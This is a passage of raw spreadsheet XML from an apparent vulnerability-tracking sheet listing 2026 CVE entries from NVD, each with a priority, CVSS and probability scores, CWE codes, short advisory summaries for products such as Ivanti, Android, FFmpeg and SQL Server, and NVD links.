r="M100" s="5" t="inlineStr" /><c r="N100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q100" s="5" t="inlineStr" /><c r="R100" s="5" t="inlineStr"><is><t>CWE-434</t></is></c><c r="S100" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Siveillance Control Pro V3.0 (All versions &lt; V3.0.12.2173), Siveillance Control Pro V4.0 (All versions &lt; V4.0.9.2178), Siveillance Control V3.0 (All versions &lt; V3.0.22.2177), Siveillance Control V4.0 (All versions &lt; V4.0.11.2177). A vulnerability in the OIS web module allows an attacker to upload arbitrary files to the server. Successful exploitation of this vulnerability could allow an attacker to gain root access on the host system, potentially leading to a full compromise of the affected OIS environment.</t></is></c><c r="T100" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50093</t></is></c></row><row r="101"><c r="A101" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C101" s="5" t="inlineStr"><is><t>CVE-2026-12648</t></is></c><c r="D101" s="5" t="n"><v>8.800000000000001</v></c><c r="E101" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F101" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G101" s="5" t="inlineStr" /><c r="H101" s="5" t="n"><v>0.015</v></c><c r="I101" s="5" t="inlineStr" /><c r="J101" s="5" t="inlineStr" /><c r="K101" s="5" t="inlineStr" /><c r="L101" s="5" t="inlineStr" /><c r="M101" s="5" t="inlineStr" /><c r="N101" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P101" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q101" s="5" t="inlineStr" /><c r="R101" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S101" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T101" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12648</t></is></c></row><row r="102"><c r="A102" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B102" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C102" s="5" t="inlineStr"><is><t>CVE-2026-12651</t></is></c><c r="D102" s="5" t="n"><v>8.800000000000001</v></c><c r="E102" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F102" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G102" s="5" t="inlineStr" /><c r="H102" s="5" t="n"><v>0.015</v></c><c r="I102" s="5" t="inlineStr" /><c r="J102" s="5" t="inlineStr" /><c r="K102" s="5" t="inlineStr" /><c r="L102" s="5" t="inlineStr" /><c r="M102" s="5" t="inlineStr" /><c r="N102" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P102" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q102" s="5" t="inlineStr" /><c r="R102" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S102" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T102" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12651</t></is></c></row><row r="103"><c r="A103" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B103" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C103" s="5" t="inlineStr"><is><t>CVE-2026-16502</t></is></c><c r="D103" s="5" t="n"><v>8.800000000000001</v></c><c r="E103" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F103" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G103" s="5" t="inlineStr" /><c r="H103" s="5" t="n"><v>0.005</v></c><c r="I103" s="5" t="inlineStr" /><c r="J103" s="5" t="inlineStr" /><c r="K103" s="5" t="inlineStr" /><c r="L103" s="5" t="inlineStr" /><c r="M103" s="5" t="inlineStr" /><c r="N103" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q103" s="5" t="inlineStr" /><c r="R103" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S103" s="5" t="inlineStr"><is><t>The Live Composer – Free WordPress Website Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.1.18 via deserialization of untrusted input . This makes it possible for authenticated attackers, with contributor-level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is></c><c r="T103" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16502</t></is></c></row><row r="104"><c r="A104" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B104" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C104" s="5" t="inlineStr"><is><t>CVE-2026-18851</t></is></c><c r="D104" s="5" t="n"><v>8.800000000000001</v></c><c r="E104" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F104" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G104" s="5" t="inlineStr" /><c r="H104" s="5" t="n"><v>0.01</v></c><c r="I104" s="5" t="inlineStr" /><c r="J104" s="5" t="inlineStr" /><c r="K104" s="5" t="inlineStr"><is><t>ivanti:endpoint_manager_mobile</t></is></c><c r="L104" s="5" t="inlineStr" /><c r="M104" s="5" t="inlineStr" /><c r="N104" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P104" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q104" s="5" t="inlineStr" /><c r="R104" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S104" s="5" t="inlineStr"><is><t>Missing authorization in Ivanti Endpoint Manager Mobile before version 12.10.0.0, 12.9.0.2, and 12.8.0.4 allows a remote authenticated attacker to escalate their privileges to admin.</t></is></c><c r="T104" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18851</t></is></c></row><row r="105"><c r="A105" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C105" s="5" t="inlineStr"><is><t>CVE-2026-28609</t></is></c><c r="D105" s="5" t="n"><v>8.800000000000001</v></c><c r="E105" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F105" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G105" s="5" t="inlineStr" /><c r="H105" s="5" t="n"><v>0.003</v></c><c r="I105" s="5" t="inlineStr" /><c r="J105" s="5" t="inlineStr" /><c r="K105" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L105" s="5" t="inlineStr" /><c r="M105" s="5" t="inlineStr" /><c r="N105" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P105" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q105" s="5" t="inlineStr" /><c r="R105" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S105" s="5" t="inlineStr"><is><t>In read of MatroskaExtractor.cpp, there is a possible out-of-bounds write due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28609</t></is></c></row><row r="106"><c r="A106" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C106" s="5" t="inlineStr"><is><t>CVE-2026-28618</t></is></c><c r="D106" s="5" t="n"><v>8.800000000000001</v></c><c r="E106" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F106" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G106" s="5" t="inlineStr" /><c r="H106" s="5" t="n"><v>0.003</v></c><c r="I106" s="5" t="inlineStr" /><c r="J106" s="5" t="inlineStr" /><c r="K106" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L106" s="5" t="inlineStr" /><c r="M106" s="5" t="inlineStr" /><c r="N106" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P106" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q106" s="5" t="inlineStr" /><c r="R106" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S106" s="5" t="inlineStr"><is><t>In dec_frm_prepare of oapv.c, there is a possible OOB write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28618</t></is></c></row><row r="107"><c r="A107" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C107" s="5" t="inlineStr"><is><t>CVE-2026-28666</t></is></c><c r="D107" s="5" t="n"><v>8.800000000000001</v></c><c r="E107" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F107" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G107" s="5" t="inlineStr" /><c r="H107" s="5" t="n"><v>0.003</v></c><c r="I107" s="5" t="inlineStr" /><c r="J107" s="5" t="inlineStr" /><c r="K107" s="5" t="inlineStr" /><c r="L107" s="5" t="inlineStr" /><c r="M107" s="5" t="inlineStr" /><c r="N107" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P107" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q107" s="5" t="inlineStr" /><c r="R107" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S107" s="5" t="inlineStr"><is><t>In multiple functions of LocalImageResolver.java, there is a possible Remote Persistent Denial of Service due to a DNG image rendering check bypass. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28666</t></is></c></row><row r="108"><c r="A108" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C108" s="5" t="inlineStr"><is><t>CVE-2026-30754</t></is></c><c r="D108" s="5" t="n"><v>8.800000000000001</v></c><c r="E108" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F108" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G108" s="5" t="inlineStr" /><c r="H108" s="5" t="n"><v>0.003</v></c><c r="I108" s="5" t="inlineStr" /><c r="J108" s="5" t="inlineStr" /><c r="K108" s="5" t="inlineStr" /><c r="L108" s="5" t="inlineStr" /><c r="M108" s="5" t="inlineStr" /><c r="N108" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P108" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q108" s="5" t="inlineStr" /><c r="R108" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S108" s="5" t="inlineStr"><is><t>A memory corruption vulnerability exists in FFmpeg before 8.1. The RTP encoding process. In the nal_send function in libavformat/rtpenc_h264_hevc.c, a negative size parameter (size=-3) is passed to memcpy when transmitting H.264/HEVC streams via RTP using a crafted input file. This was detected using AddressSanitizer.</t></is></c><c r="T108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-30754</t></is></c></row><row r="109"><c r="A109" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C109" s="5" t="inlineStr"><is><t>CVE-2026-49879</t></is></c><c r="D109" s="5" t="n"><v>8.800000000000001</v></c><c r="E109" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F109" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G109" s="5" t="inlineStr" /><c r="H109" s="5" t="n"><v>0.003</v></c><c r="I109" s="5" t="inlineStr" /><c r="J109" s="5" t="inlineStr" /><c r="K109" s="5" t="inlineStr" /><c r="L109" s="5" t="inlineStr" /><c r="M109" s="5" t="inlineStr" /><c r="N109" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P109" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q109" s="5" t="inlineStr" /><c r="R109" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S109" s="5" t="inlineStr"><is><t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49879</t></is></c></row><row r="110"><c r="A110" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B110" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C110" s="5" t="inlineStr"><is><t>CVE-2026-49882</t></is></c><c r="D110" s="5" t="n"><v>8.800000000000001</v></c><c r="E110" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F110" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G110" s="5" t="inlineStr" /><c r="H110" s="5" t="n"><v>0.003</v></c><c r="I110" s="5" t="inlineStr" /><c r="J110" s="5" t="inlineStr" /><c r="K110" s="5" t="inlineStr" /><c r="L110" s="5" t="inlineStr" /><c r="M110" s="5" t="inlineStr" /><c r="N110" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O110" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P110" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q110" s="5" t="inlineStr" /><c r="R110" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S110" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49882</t></is></c></row><row r="111"><c r="A111" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B111" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C111" s="5" t="inlineStr"><is><t>CVE-2026-62706</t></is></c><c r="D111" s="5" t="n"><v>8.800000000000001</v></c><c r="E111" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F111" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G111" s="5" t="inlineStr" /><c r="H111" s="5" t="n"><v>0.006</v></c><c r="I111" s="5" t="inlineStr" /><c r="J111" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K11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11" s="5" t="inlineStr" /><c r="M111" s="5" t="inlineStr" /><c r="N111" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P111" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q111" s="5" t="inlineStr" /><c r="R111" s="5" t="inlineStr"><is><t>CWE-121, CWE-125</t></is></c><c r="S111" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t></is></c></row><row r="112"><c r="A112" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B112" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C112" s="5" t="inlineStr"><is><t>CVE-2026-62744</t></is></c><c r="D112" s="5" t="n"><v>8.800000000000001</v></c><c r="E112" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F112" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G112" s="5" t="inlineStr" /><c r="H112" s="5" t="n"><v>0.008</v></c><c r="I112" s="5" t="inlineStr" /><c r="J112" s="5" t="inlineStr" /><c r="K112" s="5" t="inlineStr" /><c r="L112" s="5" t="inlineStr" /><c r="M112" s="5" t="inlineStr" /><c r="N112" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P112" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q112" s="5" t="inlineStr" /><c r="R112" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S112" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62744</t></is></c></row><row r="113"><c r="A113" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B113" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C113" s="5" t="inlineStr"><is><t>CVE-2026-62895</t></is></c><c r="D113" s="5" t="n"><v>8.800000000000001</v></c><c r="E113" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F113" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G113" s="5" t="inlineStr" /><c r="H113" s="5" t="n"><v>0.007</v></c><c r="I113" s="5" t="inlineStr" /><c r="J113" s="5" t="inlineStr" /><c r="K113" s="5" t="inlineStr" /><c r="L113" s="5" t="inlineStr" /><c r="M113" s="5" t="inlineStr" /><c r="N113" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O113" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P113" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q113" s="5" t="inlineStr" /><c r="R113" s="5" t="inlineStr"><is><t>CWE-1390, CWE-89, CWE-942</t></is></c><c r="S113" s="5" t="inlineStr"><is><t>Permissive cross-domain policy with untrusted domains in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62895</t></is></c></row><row r="114"><c r="A114" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B114" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C114" s="5" t="inlineStr"><is><t>CVE-2026-65772</t></is></c><c r="D114" s="5" t="n"><v>8.800000000000001</v></c><c r="E114" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F114" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G114" s="5" t="inlineStr" /><c r="H114" s="5" t="n"><v>0.008999999999999999</v></c><c r="I114" s="5" t="inlineStr" /><c r="J114" s="5" t="inlineStr" /><c r="K114" s="5" t="inlineStr" /><c r="L114" s="5" t="inlineStr" /><c r="M114" s="5" t="inlineStr" /><c r="N114" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O114" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P114" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q114" s="5" t="inlineStr" /><c r="R114" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S114" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t></is></c><c r="T114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65772</t></is></c></row><row r="115"><c r="A115" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B115" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C115" s="5" t="inlineStr"><is><t>CVE-2026-66814</t></is></c><c r="D115" s="5" t="n"><v>8.800000000000001</v></c><c r="E115" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F115" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G115" s="5" t="inlineStr" /><c r="H115" s="5" t="n"><v>0.004</v></c><c r="I115" s="5" t="inlineStr" /><c r="J115" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K115" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L115" s="5" t="inlineStr" /><c r="M115" s="5" t="inlineStr" /><c r="N115" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O115" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P115" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q115" s="5" t="inlineStr" /><c r="R115" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S115" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t></is></c></row><row r="116"><c r="A116" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B116" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C116" s="5" t="inlineStr"><is><t>CVE-2026-66818</t></is></c><c r="D116" s="5" t="n"><v>8.800000000000001</v></c><c r="E116" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F116" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G116" s="5" t="inlineStr" /><c r="H116" s="5" t="n"><v>0.006</v></c><c r="I116" s="5" t="inlineStr" /><c r="J116" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K116" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L116" s="5" t="inlineStr" /><c r="M116" s="5" t="inlineStr" /><c r="N116" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O116" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P116" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q116" s="5" t="inlineStr" /><c r="R116" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S116" s="5" t="inlineStr"><is><t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t></is></c></row><row r="117"><c r="A117" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B117" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C117" s="5" t="inlineStr"><is><t>CVE-2026-66819</t></is></c><c r="D117" s="5" t="n"><v>8.800000000000001</v></c><c r="E117" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F117" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G117" s="5" t="inlineStr" /><c r="H117" s="5" t="n"><v>0.007</v></c><c r="I117" s="5" t="inlineStr" /><c r="J117" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K117" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L117" s="5" t="inlineStr" /><c r="M117" s="5" t="inlineStr" /><c r="N117" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P117" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q117" s="5" t="inlineStr" /><c r="R117" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S117" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t></is></c></row><row r="118"><c r="A118" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B118" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C118" s="5" t="inlineStr"><is><t>CVE-2026-66820</t></is></c><c r="D118" s="5" t="n"><v>8.800000000000001</v></c><c r="E118" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F118" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G118" s="5" t="inlineStr" /><c r="H118" s="5" t="n"><v>0.005</v></c><c r="I118" s="5" t="inlineStr" /><c r="J118" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K118" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L118" s="5" t="inlineStr" /><c r="M118" s="5" t="inlineStr" /><c r="N118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P118" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q118" s="5" t="inlineStr" /><c r="R118" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S118" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t></is></c></row><row r="119"><c r="A119" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B119" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C119" s="5" t="inlineStr"><is><t>CVE-2026-67368</t></is></c><c r="D119" s="5" t="n"><v>8.800000000000001</v></c><c r="E119" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F119" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G119" s="5" t="inlineStr" /><c r="H119" s="5" t="n"><v>0.007</v></c><c r="I119" s="5" t="inlineStr" /><c r="J119" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K119" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L119" s="5" t="inlineStr" /><c r="M119" s="5" t="inlineStr" /><c r="N119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O119" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P119" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q119" s="5" t="inlineStr" /><c r="R119" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S119" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t></is></c></row><row r="120"><c r="A120" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B120" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C120" s="5" t="inlineStr"><is><t>CVE-2026-67370</t></is></c><c r="D120" s="5" t="n"><v>8.800000000000001</v></c><c r="E120" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F120" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G120" s="5" t="inlineStr" /><c r="H120" s="5" t="n"><v>0.007</v></c><c r="I120" s="5" t="inlineStr" /><c r="J120" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K120" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L120" s="5" t="inlineStr" /><c r="M120" s="5" t="inlineStr" /><c r="N120" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O120" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P120" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q120" s="5" t="inlineStr" /><c r="R120" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S120" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t></is></c></row><row r="121"><c r="A121" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B121" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C121" s="5" t="inlineStr"><is><t>CVE-2026-67373</t></is></c><c r="D121" s="5" t="n"><v>8.800000000000001</v></c><c r="E121" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F121" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G121" s="5" t="inlineStr" /><c r="H121" s="5" t="n"><v>0.006</v></c><c r="I121" s="5" t="inlineStr" /><c r="J121" s="5" 